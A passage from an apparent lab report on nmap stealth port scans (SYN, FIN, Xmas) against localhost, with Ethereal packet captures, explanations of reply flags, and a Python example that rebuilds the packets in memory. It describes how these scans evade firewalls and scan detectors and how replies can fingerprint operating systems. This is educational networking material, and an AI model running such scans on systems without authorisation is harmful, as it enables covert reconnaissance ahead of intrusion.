    Flags: 0x0012 (SYN, ACK)
        0... .... = Congestion Window Reduced (CWR): Not set
        .0.. .... = ECN-Echo: Not set
        ..0. .... = Urgent: Not set
        ...1 .... = Acknowledgment: Set
        .... 0... = Push: Not set
        .... .0.. = Reset: Not set
        .... ..1. = Syn: Set
        .... ...0 = Fin: Not set
    Window size: 32767
    Checksum: 0x9ea6 (correct)
    Options: (4 bytes)
        Maximum segment size: 16396 bytes

Frame 3 (54 on wire, 54 captured)
    Arrival Time: Mar 25, 2006 19:46:03.835998000
    Time delta from previous packet: 0.000014000 seconds
    Time relative to first packet: 0.000050000 seconds
    Frame Number: 3
    Packet Length: 54 bytes
    Capture Length: 54 bytes
Ethernet II
    Destination: 00:00:00:00:00:00 (XEROX_00:00:00)
    Source: 00:00:00:00:00:00 (XEROX_00:00:00)
    Type: IP (0x0800)
Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 40
    Identification: 0x0000
    Flags: 0x04
        .1.. = Don't fragment: Set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 64
    Protocol: TCP (0x06)
    Header checksum: 0x3cce (correct)
    Source: Knoppix (127.0.0.1)
    Destination: Knoppix (127.0.0.1)
Transmission Control Protocol, Src Port: 50785 (50785), Dst Port: www (80), Seq: 1334789944, Ack: 0, Len: 0
    Source port: 50785 (50785)
    Destination port: www (80)
    Sequence number: 1334789944
    Header length: 20 bytes
    Flags: 0x0004 (RST)
        0... .... = Congestion Window Reduced (CWR): Not set
        .0.. .... = ECN-Echo: Not set
        ..0. .... = Urgent: Not set
        ...0 .... = Acknowledgment: Not set
        .... 0... = Push: Not set
        .... .1.. = Reset: Set
        .... ..0. = Syn: Not set
        .... ...0 = Fin: Not set
    Window size: 0
    Checksum: 0x5465 (correct)

Frame 4 (54 on wire, 54 captured)
    Arrival Time: Mar 25, 2006 19:46:10.978947000
    Time delta from previous packet: 7.142949000 seconds
    Time relative to first packet: 7.142999000 seconds
    Frame Number: 4
    Packet Length: 54 bytes
    Capture Length: 54 bytes
Ethernet II
    Destination: 00:00:00:00:00:00 (XEROX_00:00:00)
    Source: 00:00:00:00:00:00 (XEROX_00:00:00)
    Type: IP (0x0800)
Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 40
    Identification: 0x6e24
    Flags: 0x00
        .0.. = Don't fragment: Not set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 43
    Protocol: TCP (0x06)
    Header checksum: 0x23aa (correct)
    Source: Knoppix (127.0.0.1)
    Destination: Knoppix (127.0.0.1)
Transmission Control Protocol, Src Port: 52255 (52255), Dst Port: 90 (90), Seq: 965727951, Ack: 0, Len: 0
    Source port: 52255 (52255)
    Destination port: 90 (90)
    Sequence number: 965727951
    Header length: 20 bytes
    Flags: 0x0002 (SYN)
        0... .... = Congestion Window Reduced (CWR): Not set
        .0.. .... = ECN-Echo: Not set
        ..0. .... = Urgent: Not set
        ...0 .... = Acknowledgment: Not set
        .... 0... = Push: Not set
        .... .0.. = Reset: Not set
        .... ..1. = Syn: Set
        .... ...0 = Fin: Not set
    Window size: 4096
    Checksum: 0xc507 (correct)

Frame 5 (54 on wire, 54 captured)
    Arrival Time: Mar 25, 2006 19:46:10.978973000
    Time delta from previous packet: 0.000026000 seconds
    Time relative to first packet: 7.143025000 seconds
    Frame Number: 5
    Packet Length: 54 bytes
    Capture Length: 54 bytes
Ethernet II
    Destination: 00:00:00:00:00:00 (XEROX_00:00:00)
    Source: 00:00:00:00:00:00 (XEROX_00:00:00)
    Type: IP (0x0800)
Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 40
    Identification: 0x0000
    Flags: 0x04
        .1.. = Don't fragment: Set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 64
    Protocol: TCP (0x06)
    Header checksum: 0x3cce (correct)
    Source: Knoppix (127.0.0.1)
    Destination: Knoppix (127.0.0.1)
Transmission Control Protocol, Src Port: 90 (90), Dst Port: 52255 (52255), Seq: 0, Ack: 965727952, Len: 0
    Source port: 90 (90)
    Destination port: 52255 (52255)
    Sequence number: 0
    Acknowledgement number: 965727952
    Header length: 20 bytes
    Flags: 0x0014 (RST, ACK)
        0... .... = Congestion Window Reduced (CWR): Not set
        .0.. .... = ECN-Echo: Not set
        ..0. .... = Urgent: Not set
        ...1 .... = Acknowledgment: Set
        .... 0... = Push: Not set
        .... .1.. = Reset: Set
        .... ..0. = Syn: Not set
        .... ...0 = Fin: Not set
    Window size: 0
    Checksum: 0xd4f4 (correct)

Ethereal captured five frames. In frame 1 nmap (from port 50785) sends a SYN to port 80 (http): the start of a connection attempt. In frame 2 port 80 answers port 50785 with SYN and ACK, acknowledging the request and sending its own synchronisation, so the port is open and in service. In frame 3 port 50785 sends a RST to port 80, aborting the connection before it is ever established. nmap concludes that port 80 is active and in service at frame 2, on receiving SYN and ACK from port 80. In frame 4 nmap, from port 52255, sends a SYN to port 90 attempting a connection. In frame 5 port 90 answers port 52255 with RST and ACK, ending the attempt; at this point nmap knows port 90 is closed (no service listening). Comparing the headers shows who built each packet: nmap's own SYNs (frames 1 and 4) have TTL 40 and 43, DF clear, non-zero IP IDs, small windows (1024 and 4096) and no TCP options, whereas the RST in frame 3 has TTL 64, DF set, IP ID 0 and a sequence number equal to the acknowledgment number of the SYN,ACK, which is exactly the RST the Linux kernel generates for a SYN,ACK that matches no socket. This is the behaviour described above: with -sS nmap holds no socket for the connection, so the kernel's RST is what keeps the handshake from completing and keeps the probe out of the target's accept() logs.
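To make the header comparison concrete, the following added example (not code from the report) rebuilds frame 1 and frame 3 of the SYN-scan capture in Python from the field values Ethereal shows, recomputes the IP and TCP checksums with the RFC 1071 algorithm, and decodes reply flags into the port state each technique infers, including the FIN/NULL/Xmas case of the next section. The packets are built in memory only; the field values come from the capture, the function names are this example's own.

```python
import struct
from socket import inet_aton

# Added example, not code from the lab report. It rebuilds two packets of the
# SYN-scan capture above byte for byte (frame 1, the SYN nmap crafted, and
# frame 3, the RST the kernel sent back), checks that the IP and TCP checksums
# come out as the values Ethereal marked "(correct)", and decodes reply flags
# into the port state each scan type infers. Field values are copied from the
# capture; nothing is sent on the wire, and no root privileges are needed.

FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
FLAG_NAMES = (("FIN", FIN), ("SYN", SYN), ("RST", RST),
              ("PSH", PSH), ("ACK", ACK), ("URG", URG))


def ones_complement_sum(data):
    """RFC 1071 Internet checksum of `data` (odd length padded with a zero)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                      # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ipv4_header(src, dst, ident, ttl, payload_len, df):
    """20-byte IPv4 header (no options) carrying TCP, checksum filled in."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, ident,
                      0x4000 if df else 0, ttl, 6, 0, inet_aton(src), inet_aton(dst))
    return hdr[:10] + struct.pack("!H", ones_complement_sum(hdr)) + hdr[12:]


def tcp_header(src, dst, sport, dport, seq, ack, flags, window):
    """20-byte TCP header (no options); checksum covers the IPv4 pseudo-header."""
    hdr = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, window, 0, 0)
    pseudo = struct.pack("!4s4sBBH", inet_aton(src), inet_aton(dst), 0, 6, len(hdr))
    return hdr[:16] + struct.pack("!H", ones_complement_sum(pseudo + hdr)) + hdr[18:]


def parse(pkt):
    """Fields of a raw IPv4+TCP packet without options, as Ethereal shows them."""
    ttl, df = pkt[8], bool(pkt[6] & 0x40)
    sport, dport, seq, ack, _, flags = struct.unpack("!HHIIBB", pkt[20:34])
    return {"ip_id": int.from_bytes(pkt[4:6], "big"), "ttl": ttl, "df": df,
            "sport": sport, "dport": dport, "seq": seq, "ack": ack, "flags": flags,
            "ip_csum": int.from_bytes(pkt[10:12], "big"),
            "tcp_csum": int.from_bytes(pkt[36:38], "big")}


def flag_names(flags):
    """0x12 -> 'SYN,ACK', the text in Ethereal's 'Flags: 0x0012 (SYN, ACK)' line."""
    return ",".join(name for name, bit in FLAG_NAMES if flags & bit) or "none"


def port_state(scan, reply_flags):
    """Port state nmap infers from one reply; reply_flags=None means silence.

    connect/syn   : SYN,ACK -> open, RST -> closed, silence -> filtered
    fin/null/xmas : RST -> closed, silence -> open|filtered (nmap 3.x said open)
    """
    if scan in ("connect", "syn"):
        if reply_flags is not None and reply_flags & SYN and reply_flags & ACK:
            return "open"
        if reply_flags is not None and reply_flags & RST:
            return "closed"
        return "filtered"
    if scan in ("fin", "null", "xmas"):
        if reply_flags is None:
            return "open|filtered"
        return "closed" if reply_flags & RST else "filtered"
    raise ValueError("unknown scan type: %s" % scan)


def syn_scan_frame1():
    """nmap's SYN: 127.0.0.1:50785 -> :80, IP ID 0x62a7, TTL 40, DF clear, win 1024."""
    return (ipv4_header("127.0.0.1", "127.0.0.1", 0x62A7, 40, 20, df=False)
            + tcp_header("127.0.0.1", "127.0.0.1", 50785, 80, 1334789943, 0, SYN, 1024))


def syn_scan_frame3():
    """The kernel's RST: IP ID 0, TTL 64, DF set, seq = ack of the SYN,ACK, win 0."""
    return (ipv4_header("127.0.0.1", "127.0.0.1", 0, 64, 20, df=True)
            + tcp_header("127.0.0.1", "127.0.0.1", 50785, 80, 1334789944, 0, RST, 0))


if __name__ == "__main__":
    for name, pkt in (("frame 1", syn_scan_frame1()), ("frame 3", syn_scan_frame3())):
        f = parse(pkt)
        print(name, flag_names(f["flags"]), "ttl=%d df=%s ip_csum=0x%04x tcp_csum=0x%04x"
              % (f["ttl"], f["df"], f["ip_csum"], f["tcp_csum"]))
    print("syn scan, SYN,ACK reply :", port_state("syn", SYN | ACK))
    print("syn scan, RST,ACK reply :", port_state("syn", RST | ACK))
    print("fin scan, no reply      :", port_state("fin", None))
```

Both checksums come out exactly as Ethereal marked them (0x3227/0x5068 for nmap's SYN, 0x3cce/0x5465 for the kernel's RST), which is a useful sanity check when writing or reading raw-socket scanners: a checksum mismatch is the first thing a receiving stack silently drops. The port_state table is also where the FIN scan's weakness lives: silence is the "open" signal, and a dropping firewall produces the same silence.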

3) TCP FIN scan


Sometimes even a SYN scan is not stealthy enough. Some firewalls and packet filters watch for SYNs sent to restricted ports, and programs such as Synlogger and Courtney detect this kind of scan. These more advanced scans, however, can pass such barriers undetected. The idea is that closed ports are required to answer our probe with a RST, whereas open ports must ignore it. The FIN scan uses a bare FIN packet (surprise) as the probe, while the Xmas tree scan sets the FIN, URG and PUSH flags and the NULL scan clears all flags. Unfortunately Microsoft (as usual) decided to ignore the standard completely and do things its own way, so this kind of scan does not work against Windows 95/NT systems. On the positive side, this is a good way to tell the two platforms apart: if the scan finds closed ports the target is probably a UNIX machine, while every port showing up as open points to Windows. Exceptionally, Cisco, BSDI, HP/UX, MVS and IRIX also send RSTs instead of dropping the packet. Note that "no reply" is ambiguous: a firewall that silently drops the probe looks exactly like an open port, which is why later nmap versions report such ports as open|filtered rather than the plain open that nmap 3.10 prints below. The nmap commands we used were:
    root@ttyp1[knoppix]# nmap -sF -P0 -v -p 80 127.0.0.1

    Starting nmap V. 3.10ALPHA4 ( www.insecure.org/nmap/ )
    Host Knoppix (127.0.0.1) appears to be up ... good.
    Initiating FIN Scan against Knoppix (127.0.0.1)
    The FIN Scan took 12 seconds to scan 1 ports.
    Adding open port 80/tcp
    Interesting ports on Knoppix (127.0.0.1):
    Port       State       Service
    80/tcp     open        http

    Nmap run completed -- 1 IP address (1 host up) scanned in 12.026 seconds

    root@ttyp1[knoppix]# nmap -sF -P0 -v -p 90 127.0.0.1

    Starting nmap V. 3.10ALPHA4 ( www.insecure.org/nmap/ )
    Host Knoppix (127.0.0.1) appears to be up ... good.
    Initiating FIN Scan against Knoppix (127.0.0.1)
    The FIN Scan took 0 seconds to scan 1 ports.
    The 1 scanned port on Knoppix (127.0.0.1) is: closed

    Nmap run completed -- 1 IP address (1 host up) scanned in 0.004 seconds

The capture Ethereal produced for both commands was the following. The 12 seconds taken by the port 80 scan are visible in it: the FIN sent to port 80 got no answer, so nmap sent a second FIN six seconds later (from a different source port) and, still hearing nothing, reported the port open; the FIN sent to port 90 was answered within microseconds (frame 4), which nmap reports as closed.
Frame 1 (54 on wire, 54 captured)
    Arrival Time: Mar 25, 2006 19:48:58.528267000
    Time delta from previous packet: 0.000000000 seconds
    Time relative to first packet: 0.000000000 seconds
    Frame Number: 1
    Packet Length: 54 bytes
    Capture Length: 54 bytes
Ethernet II
    Destination: 00:00:00:00:00:00 (XEROX_00:00:00)
    Source: 00:00:00:00:00:00 (XEROX_00:00:00)
    Type: IP (0x0800)
Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 40
    Identification: 0x007f
    Flags: 0x00
        .0.. = Don't fragment: Not set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 48
    Protocol: TCP (0x06)
    Header checksum: 0x8c4f (correct)
    Source: Knoppix (127.0.0.1)
    Destination: Knoppix (127.0.0.1)
Transmission Control Protocol, Src Port: 49913 (49913), Dst Port: www (80), Seq: 0, Ack: 0, Len: 0
    Source port: 49913 (49913)
    Destination port: www (80)
    Sequence number: 0
    Header length: 20 bytes
    Flags: 0x0001 (FIN)
        0... .... = Congestion Window Reduced (CWR): Not set
        .0.. .... = ECN-Echo: Not set
        ..0. .... = Urgent: Not set
        ...0 .... = Acknowledgment: Not set
        .... 0... = Push: Not set
        .... .0.. = Reset: Not set
        .... ..0. = Syn: Not set
        .... ...1 = Fin: Set
    Window size: 1024
    Checksum: 0xea97 (correct)

Frame 2 (54 on wire, 54 captured)
    Arrival Time: Mar 25, 2006 19:49:04.532414000
    Time delta from previous packet: 6.004147000 seconds
    Time relative to first packet: 6.004147000 seconds
    Frame Number: 2
    Packet Length: 54 bytes
    Capture Length: 54 bytes
Ethernet II
    Destination: 00:00:00:00:00:00 (XEROX_00:00:00)
    Source: 00:00:00:00:00:00 (XEROX_00:00:00)
    Type: IP (0x0800)
Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 40
    Identification: 0x444f
    Flags: 0x00
        .0.. = Don't fragment: Not set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 48
    Protocol: TCP (0x06)
    Header checksum: 0x487f (correct)
    Source: Knoppix (127.0.0.1)
    Destination: Knoppix (127.0.0.1)
Transmission Control Protocol, Src Port: 49914 (49914), Dst Port: www (80), Seq: 0, Ack: 0, Len: 0
    Source port: 49914 (49914)
    Destination port: www (80)
    Sequence number: 0
    Header length: 20 bytes
    Flags: 0x0001 (FIN)
        0... .... = Congestion Window Reduced (CWR): Not set
        .0.. .... = ECN-Echo: Not set
        ..0. .... = Urgent: Not set
        ...0 .... = Acknowledgment: Not set
        .... 0... = Push: Not set
        .... .0.. = Reset: Not set
        .... ..0. = Syn: Not set
        .... ...1 = Fin: Set
    Window size: 1024
    Checksum: 0xea96 (correct)

Frame 3 (54 on wire, 54 captured)
    Arrival Time: Mar 25, 2006 19:49:20.106023000
    Time delta from previous packet: 15.573609000 seconds
    Time relative to first packet: 21.577756000 seconds
    Frame Number: 3
    Packet Length: 54 bytes
    Capture Length: 54 bytes
Ethernet II
    Destination: 00:00:00:00:00:00 (XEROX_00:00:00)
    Source: 00:00:00:00:00:00 (XEROX_00:00:00)
    Type: IP (0x0800)
Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 40
    Identification: 0x9e6a
    Flags: 0x00
        .0.. = Don't fragment: Not set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 55
    Protocol: TCP (0x06)
    Header checksum: 0xe763 (correct)
    Source: Knoppix (127.0.0.1)
    Destination: Knoppix (127.0.0.1)
Transmission Control Protocol, Src Port: 35109 (35109), Dst Port: 90 (90), Seq: 0, Ack: 0, Len: 0
    Source port: 35109 (35109)
    Destination port: 90 (90)
    Sequence number: 0
    Header length: 20 bytes
    Flags: 0x0001 (FIN)
        0... .... = Congestion Window Reduced (CWR): Not set
        .0.. .... = ECN-Echo: Not set
        ..0. .... = Urgent: Not set
        ...0 .... = Acknowledgment: Not set
        .... 0... = Push: Not set
        .... .0.. = Reset: Not set
        .... ..0. = Syn: Not set
        .... ...1 = Fin: Set
    Window size: 4096
    Checksum: 0x1862 (correct)

Frame 4 (54 on wire, 54 captured)
    Arrival Time: Mar 25, 2006 19:49:20.106048000
    Time delta from previous packet: 0.000025000 seconds
    Time relative to first packet: 21.577781000 seconds
    Frame Number: 4
    Packet Length: 54 bytes
    Capture Length: 54 bytes
Ethernet II
    Destination: 00:00:00:00:00:00 (XEROX_00:00:00)
    Source: 00:00:00:00:00:00 (XEROX_00:00:00)
    Type: IP (0x0800)
Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 40
    Identification: 0x0000
    Flags: 0x04
        .1.. = Don't fragment: Set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 64
    Protocol: TCP (0x06)
    Header checksum: 0x3cce (correct)
    Source: Knoppix (127.0.0.1)
    Destination: Knoppix (127.0.0.1)
Transmission Control Protocol, Src Port: 90 (90), Dst Port: 35109 (35109), Seq: 0, Ack: 1, Len: 0
    Source port: 90 (90)
    Destination port: 35109 (35109)
    Sequence number: 0
    Acknowledgement number: 1
    Header length: 20 bytes
    Flags: 0x0014 (RST, ACK)
        0... .... = Congestion Window Reduced (CWR): Not set
        .0.. .... = ECN-Echo: Not set
        ..0. .... = Urgent: Not set
        ...1 .... = Acknowledgment: Set
        .... 0... = Push: Not set
        .... .1.. = Reset: Set
        .... ..0. = Syn: Not set
        .... ...0 = Fin: Not set
    Window size: 0
    Checksum: 0x284e (correct)

As can be seen, Ethereal captured four frames. In frame 1 nmap (from port 49913) sends a segment with only the FIN flag set to port 80 (http). In frame 2, about six seconds later, nmap sends a second FIN from port 49914 to the same port 80: the first probe received no answer within the timeout, so nmap retransmits before drawing any conclusion, which is why scanning a single port took 12 seconds. nmap then reports port 80 as open because no RST came back for either FIN. This is the behaviour RFC 793 prescribes: a socket in LISTEN silently discards a segment that carries neither SYN, RST nor ACK, whereas a closed port must answer every such segment with a RST. Two caveats a practitioner should keep in mind: "no answer" is also exactly what a firewall that silently drops the probe produces, which is why later nmap releases report this state as open|filtered rather than open; and TCP stacks that do not follow RFC 793 on this point (Windows, for instance) send a RST for open and closed ports alike, so the FIN scan cannot tell them apart. In frame 3 nmap, from port 35109, sends a FIN to port 90. In frame 4 port 90 answers with RST and ACK (acknowledgement number 1, since the FIN occupies one sequence number) to nmap's port 35109, and on seeing that RST nmap concludes immediately that port 90 is closed (no service listening). Note also that the probes are crafted by nmap itself (varying TTL and IP identification), while the RST carries the kernel's own defaults (TTL 64, Don't fragment set, identification 0); that difference is a useful tell when reading captures of this kind.


4) TCP Xmas Tree Scan


The nmap commands we used were the following:
root@ttyp1[knoppix]# nmap -sX -P0 -v -p 80 127.0.0.1

Starting nmap V. 3.10ALPHA4 ( www.insecure.org/nmap/ )
Host Knoppix (127.0.0.1) appears to be up ... good.
Initiating XMAS Scan against Knoppix (127.0.0.1)
The XMAS Scan took 12 seconds to scan 1 ports.
Adding open port 80/tcp
Interesting ports on Knoppix (127.0.0.1):
Port       State       Service
80/tcp     open        http

Nmap run completed -- 1 IP address (1 host up) scanned in 12.030 seconds

root@ttyp1[knoppix]# nmap -sX -P0 -v -p 90 127.0.0.1

Starting nmap V. 3.10ALPHA4 ( www.insecure.org/nmap/ )
Host Knoppix (127.0.0.1) appears to be up ... good.
Initiating XMAS Scan against Knoppix (127.0.0.1)
The XMAS Scan took 0 seconds to scan 1 ports.
The 1 scanned port on Knoppix (127.0.0.1) is: closed

Nmap run completed -- 1 IP address (1 host up) scanned in 0.004 seconds

The capture that the Ethereal sniffer made of both commands was the following:
Frame 1 (54 on wire, 54 captured)
    Arrival Time: Mar 25, 2006 19:52:06.423370000
    Time delta from previous packet: 0.000000000 seconds
    Time relative to first packet: 0.000000000 seconds
    Frame Number: 1
    Packet Length: 54 bytes
    Capture Length: 54 bytes
Ethernet II
    Destination: 00:00:00:00:00:00 (XEROX_00:00:00)
    Source: 00:00:00:00:00:00 (XEROX_00:00:00)
    Type: IP (0x0800)
Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 40
    Identification: 0x4170
    Flags: 0x00
        .0.. = Don't fragment: Not set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 56
    Protocol: TCP (0x06)
    Header checksum: 0x435e (correct)
    Source: Knoppix (127.0.0.1)
    Destination: Knoppix (127.0.0.1)
Transmission Control Protocol, Src Port: 49513 (49513), Dst Port: www (80), Seq: 0, Ack: 0, Len: 0
    Source port: 49513 (49513)
    Destination port: www (80)
    Sequence number: 0
    Header length: 20 bytes
    Flags: 0x0029 (FIN, PSH, URG)
        0... .... = Congestion Window Reduced (CWR): Not set
        .0.. .... = ECN-Echo: Not set
        ..1. .... = Urgent: Set
        ...0 .... = Acknowledgment: Not set
        .... 1... = Push: Set
        .... .0.. = Reset: Not set
        .... ..0. = Syn: Not set
        .... ...1 = Fin: Set
    Window size: 1024
    Checksum: 0xebff (correct)
    Urgent pointer: 0

Frame 2 (54 on wire, 54 captured)
    Arrival Time: Mar 25, 2006 19:52:12.432586000
    Time delta from previous packet: 6.009216000 seconds
    Time relative to first packet: 6.009216000 seconds
    Frame Number: 2
    Packet Length: 54 bytes
    Capture Length: 54 bytes
Ethernet II
    Destination: 00:00:00:00:00:00 (XEROX_00:00:00)
    Source: 00:00:00:00:00:00 (XEROX_00:00:00)
    Type: IP (0x0800)
Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 40
    Identification: 0xa178
    Flags: 0x00
        .0.. = Don't fragment: Not set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 56
    Protocol: TCP (0x06)
    Header checksum: 0xe355 (correct)
    Source: Knoppix (127.0.0.1)
    Destination: Knoppix (127.0.0.1)
Transmission Control Protocol, Src Port: 49514 (49514), Dst Port: www (80), Seq: 0, Ack: 0, Len: 0
    Source port: 49514 (49514)
    Destination port: www (80)
    Sequence number: 0
    Header length: 20 bytes
    Flags: 0x0029 (FIN, PSH, URG)
        0... .... = Congestion Window Reduced (CWR): Not set
        .0.. .... = ECN-Echo: Not set
        ..1. .... = Urgent: Set
        ...0 .... = Acknowledgment: Not set
        .... 1... = Push: Set
        .... .0.. = Reset: Not set
        .... ..0. = Syn: Not set
        .... ...1 = Fin: Set
    Window size: 1024
    Checksum: 0xebfe (correct)
    Urgent pointer: 0

Frame 3 (54 on wire, 54 captured)
    Arrival Time: Mar 25, 2006 19:52:28.497773000
    Time delta from previous packet: 16.065187000 seconds
    Time relative to first packet: 22.074403000 seconds
    Frame Number: 3
    Packet Length: 54 bytes
    Capture Length: 54 bytes
Ethernet II
    Destination: 00:00:00:00:00:00 (XEROX_00:00:00)
    Source: 00:00:00:00:00:00 (XEROX_00:00:00)
    Type: IP (0x0800)
Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 40
    Identification: 0x3349
    Flags: 0x00
        .0.. = Don't fragment: Not set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 45
    Protocol: TCP (0x06)
    Header checksum: 0x5c85 (correct)
    Source: Knoppix (127.0.0.1)
    Destination: Knoppix (127.0.0.1)
Transmission Control Protocol, Src Port: 60229 (60229), Dst Port: 90 (90), Seq: 0, Ack: 0, Len: 0
    Source port: 60229 (60229)
    Destination port: 90 (90)
    Sequence number: 0
    Header length: 20 bytes
    Flags: 0x0029 (FIN, PSH, URG)
        0... .... = Congestion Window Reduced (CWR): Not set
        .0.. .... = ECN-Echo: Not set
        ..1. .... = Urgent: Set
        ...0 .... = Acknowledgment: Not set
        .... 1... = Push: Set
        .... .0.. = Reset: Not set
        .... ..0. = Syn: Not set
        .... ...1 = Fin: Set
    Window size: 2048
    Checksum: 0xbe19 (correct)
    Urgent pointer: 0

Frame 4 (54 on wire, 54 captured)
    Arrival Time: Mar 25, 2006 19:52:28.497798000
    Time delta from previous packet: 0.000025000 seconds
    Time relative to first packet: 22.074428000 seconds
    Frame Number: 4
    Packet Length: 54 bytes
    Capture Length: 54 bytes
Ethernet II
    Destination: 00:00:00:00:00:00 (XEROX_00:00:00)
    Source: 00:00:00:00:00:00 (XEROX_00:00:00)
    Type: IP (0x0800)
Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 40
    Identification: 0x0000
    Flags: 0x04
        .1.. = Don't fragment: Set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 64
    Protocol: TCP (0x06)
    Header checksum: 0x3cce (correct)
    Source: Knoppix (127.0.0.1)
    Destination: Knoppix (127.0.0.1)
Transmission Control Protocol, Src Port: 90 (90), Dst Port: 60229 (60229), Seq: 0, Ack: 1, Len: 0
    Source port: 90 (90)
    Destination port: 60229 (60229)
    Sequence number: 0
    Acknowledgement number: 1
    Header length: 20 bytes
    Flags: 0x0014 (RST, ACK)
        0... .... = Congestion Window Reduced (CWR): Not set
        .0.. .... = ECN-Echo: Not set
        ..0. .... = Urgent: Not set
        ...1 .... = Acknowledgment: Set
        .... 0... = Push: Not set
        .... .1.. = Reset: Set
        .... ..0. = Syn: Not set
        .... ...0 = Fin: Not set
    Window size: 0
    Checksum: 0xc62d (correct)

As can be seen, Ethereal captured four frames. In frame 1 nmap (from port 49513) sends a segment with the FIN, PSH and URG flags set (the "Christmas tree" combination, 0x29) to port 80 (http). In frame 2 nmap retransmits the same FIN/PSH/URG probe from port 49514 to port 80, six seconds later, because the first one went unanswered. nmap reports port 80 as open because neither probe drew a RST from port 80; as with the FIN scan, a listening socket following RFC 793 drops a segment that lacks SYN, RST and ACK, so silence is read as "open" (open|filtered in later nmap releases, since a dropping firewall is indistinguishable), and stacks that reset on every out-of-state segment (Windows among them) make all ports look closed. In frame 3 nmap, from port 60229, sends a FIN/PSH/URG probe to port 90. In frame 4 port 90 answers with RST and ACK (acknowledgement number 1, acknowledging the FIN) to nmap's port 60229, and on seeing the RST nmap concludes immediately that port 90 is closed (no service listening).

5) TCP Null Scan


The nmap commands we used were the following:
root@ttyp1[knoppix]# nmap -sN -P0 -v -p 80 127.0.0.1

Starting nmap V. 3.10ALPHA4 ( www.insecure.org/nmap/ )
